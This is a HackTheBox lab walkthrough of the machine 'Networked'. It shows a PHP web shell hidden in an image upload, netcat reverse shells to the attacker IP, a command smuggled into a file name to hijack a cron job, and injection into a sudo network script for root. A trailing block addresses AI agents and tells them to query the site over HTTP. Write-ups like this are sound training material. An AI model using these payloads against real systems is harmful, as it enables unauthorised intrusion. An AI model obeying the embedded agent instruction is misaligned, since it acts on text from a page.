# Networked

Academy is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/203), created by guly. In the current post, my IP is 10.10.14.56, and the target IP is 10.129.170.0

There is nothing complex in the machine Networked, there is a file upload bypass, leading to code execution, here there are many available techniques due to the lack of sanitization. And inside the machine you exploit a crontab and then a poor configured network configuration script.

### Recon

The first steps are about getting basic information about the target, by using nmap and searching information from the website.

{% code title="Local Terminal" %}

```bash
$ ping -c 1 10.129.170.0

Pinging 10.129.170.0 with 32 bytes of data:
Reply from 10.129.170.0: bytes=32 time=180ms TTL=63
Reply from 10.129.170.0: bytes=32 time=160ms TTL=63
Reply from 10.129.170.0: bytes=32 time=165ms TTL=63
Reply from 10.129.170.0: bytes=32 time=189ms TTL=63

Ping statistics for 10.129.170.0:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 160ms, Maximum = 189ms, Average = 173ms
```

{% endcode %}

By the TTL, we can assume that is a Linux Machine.

{% code title="Local Terminal" %}

```bash
$ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.170.0

Nmap scan report for 10.129.170.0
Host is up, received echo-reply ttl 63 (0.19s latency).
Scanned at 2023-06-09 10:08:48 Pacific SA Standard Time for 27s
Not shown: 65500 filtered tcp ports (no-response), 32 filtered tcp ports (host-prohibited), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 27.10 seconds
           Raw packets sent: 131055 (5.766MB) | Rcvd: 47 (2.932KB)
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
$ nmap -sCV -p 22,80 10.129.170.0

Nmap scan report for 10.129.170.0
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.18 seconds/nmap.org/submit/ .
```

{% endcode %}

Information that we have now: It's a website (port 80) that use Apache/2.4.6,

{% code title="Local Terminal" %}

```bash
$ whatweb 10.129.170.0
http://10.129.170.0 [200 OK] Apache[2.4.6], Country[RESERVED][ZZ], 
HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[10.129.170.0], 
PHP[5.4.16], X-Powered-By[PHP/5.4.16]
```

{% endcode %}

* Browser > <http://10.129.170.0>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FdehFQ7U1KiFqBapkG9DQ%2Fimage.png?alt=media&#x26;token=c55b0033-9e53-41a5-b4f4-7bb27dde8cdd" alt=""><figcaption><p>Nothing relevant</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
wfuzz -c -t 200 --hc=404 -w /shared/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.170.0/FUZZ
```

{% endcode %}

```javascript
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.129.170.0/FUZZ
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000150:   301        7 L      20 W       236 Ch      "uploads"
000001612:   301        7 L      20 W       235 Ch      "backup"
```

* /uploads/ > Nothing
* /backup/ > There is a file, download **backup.tar,** inside the .tar file you can find four files, index.php, lib.php, photos.php and upload.php
  * Index.php > Front page
  * lib.php > Nothing
  * photos.php > photo gallery, if you can upload, this will be useful.
  * upload.php > you can upload files, this is the most valuable place by now.&#x20;

### Reverse Shell \[apache]

Go to **<http://10.129.170.0/upload.php>** and upload any image

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F5l9NHmjBU6IAV5Jnwt7f%2Fimage.png?alt=media&#x26;token=1439194e-5298-40e1-8d90-7c51f19b7d20" alt=""><figcaption><p><a href="http://10.129.170.0/photos.php">http://10.129.170.0/photos.php</a></p></figcaption></figure>

As you can see, we can visualice the images uploaded, we want to exploit this. Intercept a file upload.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2Fvf3Gt8APRIkVjOcQ91P8%2Fimage.png?alt=media&#x26;token=d1559fc5-461f-473a-aa0f-cecc9842d233" alt=""><figcaption><p>Interception result, it shows the uploaded file in a raw format</p></figcaption></figure>

Now that we know that uploading files is an alternative, our best option is to inject a php command. Add "**\<?php system($\_GET\['cmd]); ?>**" at the 3rd row, or anywhere. And upload the image.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FncB7sCjXHQn0nt0dhRrT%2Fimage.png?alt=media&#x26;token=b473ceb9-d1a9-4895-8de5-22fb0d4d461c" alt=""><figcaption><p>Sample with the payload</p></figcaption></figure>

* Browser > <http://10.129.170.0/photos.php>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FyXCb8Gpw2YU0JjeFIqnp%2Fimage.png?alt=media&#x26;token=19b8549d-ea3a-45e5-bd38-e362e3cd29e4" alt=""><figcaption></figcaption></figure>

Nothing, but before by fuzzing we found a blank site called /uploads/

* Browser > <http://10.129.170.0/uploads/10_10_14_56.jpg>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FRnvAPv9WYdQn2v1qGE0Y%2Fimage.png?alt=media&#x26;token=5cd04bc8-d7aa-4f3a-9008-9d210bcdf025" alt=""><figcaption></figcaption></figure>

The image is alone, great, this means that we can apply the command through 'cmd'.

* Browser > <http://10.129.170.0/uploads/10_10_14_56.php.jpg?cmd=id>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FwGlCAMdlKeucZuVvcjRT%2Fimage.png?alt=media&#x26;token=bf13fdc8-4fab-4ebe-885d-2f093e7ab373" alt=""><figcaption></figcaption></figure>

It works, let's connect through netcat

{% code title="Local Terminal" %}

```bash
nc -nlvp 443
```

{% endcode %}

* Browser > <http://10.129.170.0/uploads/10\\_10\\_14\\_56.php.jpg?cmd=nc> -e /bin/bash 10.10.14.56 443

And we are in! Let's do a [bash upgrade](https://robertos-notebook.gitbook.io/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade)

### User Pivot \[Guly]

Basic scouting

{% code title=" Target Terminal \[apache]" %}

```bash
bash-4.2$ id
uid=48(apache) gid=48(apache) groups=48(apache)

bash-4.2$ whoami
apache

bash-4.2$ hostname -I
10.129.170.0 dead:beef::250:56ff:feb9:94b9

bash-4.2$ cd /home
bash-4.2$ ls
guly
```

{% endcode %}

So there is one user, maybe we can enter to that folder

{% code title="Target Terminal \[apache]" %}

```bash
bash-4.2$ cd guly              # :o
bash-4.2$ ls
check_attack.php  crontab.guly  user.txt

bash-4.2$ cat user.txt         # :(
cat: user.txt: Permission denied
```

{% endcode %}

Ok, we need to change the user...

{% code title=" Target Terminal \[apache]" %}

```bash
$ cat crontab.guly
*/3 * * * * php /home/guly/check_attack.php

$ ls -l
total 12
-r--r--r--. 1 root root 782 Oct 30  2018 check_attack.php
```

{% endcode %}

This is interesting, it execute the command check\_attack.php by using another user (Guly) each 3 minutes

```bash
$ cat check_attack.php
```

{% code title="check\_attack.php" %}

```php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/'; # Take note of the PATH!
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n"; # It removes directly, maybe we can inject commands
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>
```

{% endcode %}

{% code title="Target Terminal \[apache]" %}

```bash
bash-4.2$ ls -l
total 12
-r--r--r--. 1 root root 782 Oct 30  2018 check_attack.php
```

{% endcode %}

And it's executed by root

{% code title="Target Terminal \[apache]" %}

```bash
cd /var/www/html/uploads/
```

{% endcode %}

Open a new local terminal, and prepare a listening netcat

{% code title="Local Terminal" %}

```bash
nc -nlvp 444
```

{% endcode %}

{% code title="Target Terminal \[apache]" %}

```bash
bash-4.2$ touch '; nc -c bash 10.10.14.56 444'
bash-4.2$ ls -l

total 116
-rw-r--r--  1 apache apache 46961 Jun  9 21:57 10_10_14_56.jpg
-rw-r--r--  1 apache apache 46961 Jun  9 22:34 10_10_14_56.php.jpg
-rw-r--r--. 1 root   root    3915 Oct 30  2018 127_0_0_1.png
-rw-r--r--. 1 root   root    3915 Oct 30  2018 127_0_0_2.png
-rw-r--r--. 1 root   root    3915 Oct 30  2018 127_0_0_3.png
-rw-r--r--. 1 root   root    3915 Oct 30  2018 127_0_0_4.png
-rw-r--r--  1 apache apache     0 Jun  9 22:55 ; nc -c bash 10.10.14.56 444
-r--r--r--. 1 root   root       2 Oct 30  2018 index.html
```

{% endcode %}

And there is our file... now we wait, crontab.guly says that it will execute after some time.

Apply a bash upgrade and continue.

{% code title="Target Terminal \[guly]" %}

```bash
[guly@networked ~]$ cat /home/guly/user.txt
70680e5809fd6d3350e0c432938dd588
```

{% endcode %}

### Privileges Escalation

{% code title="Target Terminal \[guly]" %}

```bash
[guly@networked ~]$ id
uid=1000(guly) gid=1000(guly) groups=1000(guly)

[guly@networked ~]$ sudo -l
Matching Defaults entries for guly on networked:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
    (root) NOPASSWD: /usr/local/sbin/changename.sh
```

{% endcode %}

Looks like we can execute that custom .sh file as root, let's what's inside

{% code title="Target Terminal \[guly]" %}

```bash
cat /usr/local/sbin/changename.sh
```

{% endcode %}

```bash
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF # It reads the network-script folder.
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do # There is a interaction with the user
        echo "interface $var:"
        read x # We can inject a command here
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

/sbin/ifup guly0
```

It reads the network-script folder.

{% code title="Target Terminal \[guly]" %}

```bash
[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
interface NAME:
a bash #write this.
interface PROXY_METHOD:
a
interface BROWSER_ONLY:
a
interface BOOTPROTO:
a
```

{% endcode %}

{% code title="Target Terminal \[root]" %}

```bash
[root@networked network-scripts]$ cat /root/root.txt
666702788dadb24f434a7dde10258ce5
```

{% endcode %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://robertos-notebook.gitbook.io/cybersecurity/hack-the-box/old-machines/easy-machine/networked.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.